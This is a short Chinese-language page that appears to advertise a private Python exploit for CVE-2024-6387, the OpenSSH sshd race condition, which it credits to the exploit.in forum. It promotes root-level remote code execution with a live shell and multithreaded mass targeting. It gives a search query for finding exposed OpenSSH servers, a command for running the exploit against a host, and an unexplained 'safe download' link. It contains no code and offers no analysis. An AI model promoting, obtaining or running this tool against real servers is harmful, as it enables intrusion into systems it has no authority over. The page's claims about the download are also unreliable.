用于 CVE-2024-6387 的私有 x64 RCE 漏洞利用(Python)[2024.07.02],来自 exploit.in
该仓库提供了 CVE-2024-6387 漏洞利用的工作变体,支持实时活动 shell、多线程、从文件输入目标以及彩色输出。
针对 CVE-2024-6387 的漏洞利用,攻击基于 glibc 的 Linux 系统中 OpenSSH 服务器(sshd)的信号处理器竞态条件。由于 SIGALRM 处理程序中调用了异步信号不安全的函数,该漏洞允许以 root 权限远程执行代码。
该漏洞利用针对 OpenSSH sshd 中的 SIGALRM 处理程序竞态条件,该处理程序调用了异步信号不安全的函数。可利用此漏洞实现以 root 权限远程执行代码。
app:"OpenSSH"
OpenSSH 8.5p1 至 9.8p1
运行漏洞利用需要 Python 3.9。 执行:
python exploit.py -h 10.10.10.10 -c 'id'
点击此处下载(安全下载!)